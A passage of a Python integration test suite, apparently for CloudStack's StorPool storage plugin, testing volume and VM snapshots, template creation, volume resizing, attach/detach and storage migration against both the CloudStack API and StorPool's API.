Exception(err) template = self.create_template_from_snapshot(self.apiclient, self.services, snapshotid = snapshot.id) template_from_volume = self.create_template_from_snapshot(self.apiclient, self.services, volumeid = volume[0].id) Volume.delete(delete, self.apiclient, ) Snapshot.delete(snapshot, self.apiclient) flag = False try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) if snapshot_details is not None: try: for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: flag = False if flag is True: raise Exception("Snapshot was not deleted") except Exception as err: self.debug('Snapshot was deleted %s' % err) Template.delete(template, self.apiclient, zoneid = self.zone.id) Template.delete(template_from_volume, self.apiclient, zoneid = self.zone.id) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_08_delete_snapshot_of_deleted_volume(self): ''' Delete snapshot and template if volume is already deleted, bypassing secondary ''' backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") volume = Volume.create( self.apiclient, {"diskname":"StorPoolDisk-Delete" }, zoneid = self.zone.id, diskofferingid = self.disk_offerings.id, account=self.account.name, domainid=self.account.domainid, ) delete = volume self.virtual_machine2.attach_volume( self.apiclient, volume ) self.virtual_machine2.detach_volume( self.apiclient, volume ) volume = list_volumes(self.apiclient, id = volume.id) name = volume[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) if snapshot_details is not None: flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: raise Exception(err) if flag == False: raise Exception("Could not find snapshot in snapshot details") except Exception as err: raise Exception(err) template = self.create_template_from_snapshot(self.apiclient, self.services, snapshotid = snapshot.id) Volume.delete(delete, self.apiclient, ) Snapshot.delete(snapshot, self.apiclient) flag = False try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) if snapshot_details is not None: try: for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: flag = False if flag is True: raise Exception("Snapshot was not deleted") except Exception as err: self.debug('Snapshot was deleted %s' % err) Template.delete(template, self.apiclient, zoneid = self.zone.id) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_09_vm_from_bypassed_template(self): '''Create virtual machine with sp.bypass.secondary.storage=false from template created on StorPool and Secondary Storage''' volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) name = volume[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "true") snapshot = Snapshot.create( self.apiclient, volume_id = volume[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] try: sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True except spapi.ApiError as err: raise Exception(err) if flag == False: raise Exception("Could not find snapshot in snapshot details") except Exception as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") template = self.create_template_from_snapshot( self.apiclient, self.services, snapshotid = snapshot.id ) self._cleanup.append(template) flag = False sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: flag = True break else: continue break if flag is False: raise Exception("Template does not exists in Storpool") self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") backup_config = Configurations.update(self.apiclient, name = "sp.bypass.secondary.storage", value = "false") vm = VirtualMachine.create( self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid = template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10, ) ssh_client = vm.get_ssh_client(reconnect=True) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_10_create_vm_snapshots(self): """Test to create VM snapshots """ volume_attached = self.virtual_machine.attach_volume( self.apiclient, self.volume ) vol = list_volumes(self.apiclient, virtualmachineid=self.virtual_machine.id, id=volume_attached.id) name = vol[0].path.split("/")[3] sp_volume = self.spapi.volumeList(volumeName = "~" + name) self.assertEqual(volume_attached.id, self.volume.id, "Is not the same volume ") try: # Login to VM and write data to file system ssh_client = self.virtual_machine.get_ssh_client() cmds = [ "echo %s > %s/%s" % (self.random_data_0, self.test_dir, self.random_data), "sync", "sleep 1", "sync", "sleep 1", "cat %s/%s" % (self.test_dir, self.random_data) ] for c in cmds: self.debug(c) result = ssh_client.execute(c) self.debug(result) except Exception: self.fail("SSH failed for Virtual machine: %s" % self.virtual_machine.ipaddress) self.assertEqual( self.random_data_0, result[0], "Check the random data has be write into temp file!" ) time.sleep(30) MemorySnapshot = False vm_snapshot = VmSnapshot.create( self.apiclient, self.virtual_machine.id, MemorySnapshot, "TestSnapshot", "Display Text" ) self.assertEqual( vm_snapshot.state, "Ready", "Check the snapshot of vm is ready!" ) return @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_11_revert_vm_snapshots(self): """Test to revert VM snapshots """ try: ssh_client = self.virtual_machine.get_ssh_client() cmds = [ "rm -rf %s/%s" % (self.test_dir, self.random_data), "ls %s/%s" % (self.test_dir, self.random_data) ] for c in cmds: self.debug(c) result = ssh_client.execute(c) self.debug(result) except Exception: self.fail("SSH failed for Virtual machine: %s" % self.virtual_machine.ipaddress) if str(result[0]).index("No such file or directory") == -1: self.fail("Check the random data has be delete from temp file!") time.sleep(30) list_snapshot_response = VmSnapshot.list( self.apiclient, virtualmachineid=self.virtual_machine.id, listall=True) self.assertEqual( isinstance(list_snapshot_response, list), True, "Check list response returns a valid list" ) self.assertNotEqual( list_snapshot_response, None, "Check if snapshot exists in ListSnapshot" ) self.assertEqual( list_snapshot_response[0].state, "Ready", "Check the snapshot of vm is ready!" ) self.virtual_machine.stop(self.apiclient, forced=True) VmSnapshot.revertToSnapshot( self.apiclient, list_snapshot_response[0].id ) self.virtual_machine.start(self.apiclient) try: ssh_client = self.virtual_machine.get_ssh_client(reconnect=True) cmds = [ "cat %s/%s" % (self.test_dir, self.random_data) ] for c in cmds: self.debug(c) result = ssh_client.execute(c) self.debug(result) except Exception: self.fail("SSH failed for Virtual machine: %s" % self.virtual_machine.ipaddress) self.assertEqual( self.random_data_0, result[0], "Check the random data is equal with the ramdom file!" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_12_delete_vm_snapshots(self): """Test to delete vm snapshots """ list_snapshot_response = VmSnapshot.list( self.apiclient, virtualmachineid=self.virtual_machine.id, listall=True) self.assertEqual( isinstance(list_snapshot_response, list), True, "Check list response returns a valid list" ) self.assertNotEqual( list_snapshot_response, None, "Check if snapshot exists in ListSnapshot" ) VmSnapshot.deleteVMSnapshot( self.apiclient, list_snapshot_response[0].id) time.sleep(30) list_snapshot_response = VmSnapshot.list( self.apiclient, #vmid=self.virtual_machine.id, virtualmachineid=self.virtual_machine.id, listall=False) self.debug('list_snapshot_response -------------------- %s' % list_snapshot_response) self.assertIsNone(list_snapshot_response, "snapshot is already deleted") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_13_detach_volume(self): '''Attach volume on VM on 2nd zone''' self.virtual_machine.stop(self.apiclient) self.virtual_machine.detach_volume( self.apiclient, self.volume ) vol = list_volumes(self.apiclient, id=self.volume.id) name = vol[0].path.split("/")[3] spvolume = self.spapi.volumeList(volumeName = "~" + name) self.assertEqual(vol[0].id, self.volume.id, "Is not the same volume ") tags = spvolume[0].tags for t in tags: self.assertFalse(t.lower() == 'cvm'.lower(), "cvm tag still set on detached volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_14_attach_detach_volume_to_running_vm(self): ''' Test Attach Volume To Running Virtual Machine ''' time.sleep(60) self.assertEqual(VirtualMachine.RUNNING, self.virtual_machine.state, "Running") volume = self.virtual_machine.attach_volume( self.apiclient, self.volume_1 ) print(volume) self.assertIsNotNone(volume, "Volume is not None") list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id= volume.id ) print(list_vm_volumes) self.assertEqual(volume.id, list_vm_volumes[0].id, "Is true") name = list_vm_volumes[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) volume = self.virtual_machine.detach_volume( self.apiclient, self.volume_1 ) list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id = volume.id ) print(list_vm_volumes) self.assertIsNone(list_vm_volumes, "Is None") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_15_resize_root_volume_on_working_vm(self): ''' Test Resize Root volume on Running Virtual Machine ''' self.assertEqual(VirtualMachine.RUNNING, self.virtual_machine2.state, "Running") volume = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine2.id, type = "ROOT", listall = True, ) volume = volume[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertEqual(volume.type, 'ROOT', "Volume is not of ROOT type") shrinkOk = False if volume.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.size = 20 cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.size = 100 cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_16_resize_attached_volume_on_working_vm(self): ''' Test Resize Volume Attached To Running Virtual Machine ''' self.assertEqual(VirtualMachine.RUNNING, self.virtual_machine.state, "Running") volume = self.virtual_machine.attach_volume( self.apiclient, self.volume_1 ) listvol = Volume.list( self.apiclient, id=volume.id ) name = listvol[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != listvol[0].size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.diskofferingid = self.disk_offering_20.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.diskofferingid = self.disk_offering_100.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) # return to small disk volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offerings.disksize)* (1024**3)): shrinkOk= True cmd.diskofferingid = self.disk_offerings.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offerings.disksize)*(1024**3))), "Could not return to Small disk" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_17_attach_detach_volume_to_stopped_vm(self): ''' Test Attach Volume To Stopped Virtual Machine ''' virtual_machine = self.virtual_machine.stop( self.apiclient, forced=True ) time.sleep(60) volume_2 = self.virtual_machine.attach_volume( self.apiclient, self.volume_2 ) list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id= volume_2.id ) name = list_vm_volumes[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) print(list_vm_volumes) self.assertEqual(volume_2.id,list_vm_volumes[0].id, "Is true") time.sleep(90) volume_2 = self.virtual_machine.detach_volume( self.apiclient, self.volume_2 ) list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id = volume_2.id ) print(list_vm_volumes) self.assertIsNone(list_vm_volumes, "Is None") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_18_resize_attached_volume(self): ''' Test Resize Volume Attached To Virtual Machine ''' shrinkOk = False if self.volume_1.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_1.id cmd.diskofferingid = self.disk_offering_20.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_1.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) self.volume_1 = new_size[0] name = self.volume_1.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_1.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_1.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_1.id cmd.diskofferingid = self.disk_offering_100.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_1.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) # return to small disk self.volume_1 = new_size[0] name = self.volume_1.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_1.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_1.size > int((self.disk_offerings.disksize)* (1024**3)): shrinkOk= True cmd.diskofferingid = self.disk_offerings.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_1.id ) name = new_size[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != new_size[0].size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offerings.disksize)*(1024**3))), "Could not return to Small disk" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_19_resize_detached_volume(self): ''' Test Resize Volume Detached To Virtual Machine ''' list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id= self.volume_2.id ) #check that the volume is not attached to VM self.assertIsNone(list_vm_volumes, "List volumes is not None") shrinkOk = False if self.volume_2.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_2.id cmd.diskofferingid = self.disk_offering_20.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_2.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) self.volume_2 = new_size[0] name = self.volume_2.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_2.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_2.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_2.id cmd.diskofferingid = self.disk_offering_100.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_2.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) # return to small disk self.volume_2 = new_size[0] name = self.volume_2.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_2.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_2.size > int((self.disk_offerings.disksize)* (1024**3)): shrinkOk= True cmd.diskofferingid = self.disk_offerings.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_2.id ) name = new_size[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != new_size[0].size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offerings.disksize)*(1024**3))), "Could not return to Small disk" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_20_snapshot_to_volume(self): ''' Create volume from snapshot ''' snapshot = Snapshot.create( self.apiclient, volume_id = self.volume_2.id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") volume = self.create_volume( self.apiclient, zoneid = self.zone.id, snapshotid = snapshot.id, account=self.account.name, domainid=self.account.domainid ) listvol = Volume.list( self.apiclient, id=volume.id ) name = listvol[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(volume, "Could not create volume from snapshot") self.assertIsInstance(volume, Volume, "Volume is not instance of Volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_21_snapshot_detached_volume(self): ''' Test Snapshot Detached Volume ''' self.virtual_machine.stop( self.apiclient, forced = True ) self.volume = self.virtual_machine.attach_volume( self.apiclient, self.volume ) self.assertIsNotNone(self.volume, "Attach: Is none") self.volume = self.virtual_machine.detach_volume( self.apiclient, self.volume ) self.assertIsNotNone(self.volume, "Detach: Is none") snapshot = Snapshot.create( self.apiclient, self.volume.id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Snapshot is None") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not Instance of Snappshot") snapshot = Snapshot.delete( snapshot, self.apiclient ) self.assertIsNone(snapshot, "Snapshot was not deleted") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_22_snapshot_root_disk(self): ''' Test ROOT Disk Snapshot ''' vm = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid = self.zone.id, templateid = self.template.id, serviceofferingid = self.service_offering.id, hypervisor = self.hypervisor, rootdisksize = 10 ) list_volumes_of_vm = list_volumes( self.apiclient, virtualmachineid = vm.id, listall = True, ) self.assertIs(len(list_volumes_of_vm), 1, "VM has more disk than 1") snapshot = Snapshot.create( self.apiclient, list_volumes_of_vm[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Snapshot is None") self.assertEqual(list_volumes_of_vm[0].id, snapshot.volumeid, "Snapshot is not for the same volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_23_volume_to_template(self): ''' Create Template From ROOT Volume ''' volume = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) self.virtual_machine.stop(self.apiclient) template = self.create_template_from_snapshot( self.apiclient, self.services, volumeid = volume[0].id ) virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client() self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_24_migrate_vm_to_another_storage(self): ''' Migrate VM to another Primary Storage ''' list_volumes_of_vm = list_volumes( self.apiclient, virtualmachineid = self.vm_migrate.id, listall = True, ) self.assertTrue(len(list_volumes_of_vm) == 1, "There are more volumes attached to VM") if list_volumes_of_vm[0].storageid is self.primary_storage.id: cmd = migrateVirtualMachine.migrateVirtualMachineCmd() cmd.virtualmachineid = self.vm_migrate.id if hostid: cmd.hostid = hostid vm = apiclient.migrateVirtualMachine(cmd) volume = list_volumes( self.apiclient, virtualmachineid = vm.id )[0] self.assertNotEqual(volume.storageid, self.primary_storage.id, "Could not migrate VM") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_25_migrate_volume_to_another_storage(self): ''' Migrate Volume To Another Primary Storage ''' self.assertFalse(hasattr(self.volume, 'virtualmachineid') , "Volume is not detached") self.assertFalse(hasattr(self.volume, 'storageid') , "Volume is not detached") volume = Volume.migrate( self.apiclient, volumeid = self.volume.id, storageid = self.primary_storage2.id ) self.assertIsNotNone(volume, "Volume is None") self.assertEqual(volume.storageid, self.primary_storage2.id, "Storage is the same") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_26_create_vm_on_another_storpool_storage(self): """ Create Virtual Machine on another StorPool primary StoragePool""" virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=self.template.id, serviceofferingid=self.service_offering2.id, hypervisor=self.hypervisor, rootdisksize=10 ) self.assertIsNotNone(virtual_machine, "Could not create virtual machine on another Storpool primary storage") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_27_snapshot_to_volume_of_root_disk(self): ''' Create volume from snapshot ''' virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=self.template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) volume1 = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) snapshot = Snapshot.create( self.apiclient, volume_id = volume1[0].id, account=self.account.name, domainid=self.account.domainid, ) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") volume = self.create_volume( self.apiclient, zoneid = self.zone.id, snapshotid = snapshot.id, account=self.account.name, domainid=self.account.domainid ) self.assertIsNotNone(volume, "Could not create volume from snapshot") self.assertIsInstance(volume, Volume, "Volume is not instance of Volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_28_download_volume(self): vol = self.volume.extract( self.apiclient, volume_id = self.volume.id, zoneid = self.zone.id, mode = "HTTP_DOWNLOAD" ) self.assertIsNotNone(vol, "Volume is None") self.assertIsNotNone(vol.url, "No URL provided") Volume.delete(vol, self.apiclient) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_29_create_vm_from_template_not_on_storpool(self): ''' Create virtual machine from template which for some reason is deleted from StorPool, but exists in template_spoool_ref DB tables ''' volume = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) self.virtual_machine.stop(self.apiclient) template = self.create_template_from_snapshot( self.apiclient, self.services, volumeid = volume[0].id ) virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client(reconnect= True) name = 'ssd-' + template.id flag = False storpoolGlId = None sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: storpoolGlId = snap.globalId flag = True break else: continue break if flag is False: try: sp_snapshot = self.spapi.snapshotList(snapshotName = name) except spapi.ApiError as err: raise Exception(err) self.spapi.snapshotDelete(snapshotName ="~" + storpoolGlId) virtual_machine2 = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine2.get_ssh_client(reconnect= True) self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @classmethod def create_volume(self, apiclient, zoneid=None, snapshotid=None, account=None, domainid=None): """Create Volume""" cmd = createVolume.createVolumeCmd() cmd.name = "Test" if zoneid: cmd.zoneid = zoneid if snapshotid: cmd.snapshotid = snapshotid if account: cmd.account=account if domainid: cmd.domainid=domainid return Volume(apiclient.createVolume(cmd).__dict__) @classmethod def get_local_cluster(cls): storpool_clusterid = subprocess.check_output(['storpool_confshow', 'CLUSTER_ID']) clusterid = storpool_clusterid.split("=") cls.debug(storpool_clusterid) clusters = list_clusters(cls.apiclient) for c in clusters: configuration = list_configurations( cls.apiclient, clusterid = c.id ) for conf in configuration: if conf.name == 'sp.cluster.id' and (conf.value in clusterid[1]): return c @classmethod def get_remote_cluster(cls): storpool_clusterid = subprocess.check_output(['storpool_confshow', 'CLUSTER_ID']) clusterid = storpool_clusterid.split("=") cls.debug(storpool_clusterid) clusters = list_clusters(cls.apiclient) for c in clusters: configuration = list_configurations( cls.apiclient, clusterid = c.id ) for conf in configuration: if conf.name == 'sp.cluster.id' and (conf.value not in clusterid[1]): return c @classmethod def list_hosts_by_cluster_id(cls, clusterid): """List all Hosts matching criteria""" cmd = listHosts.listHostsCmd() 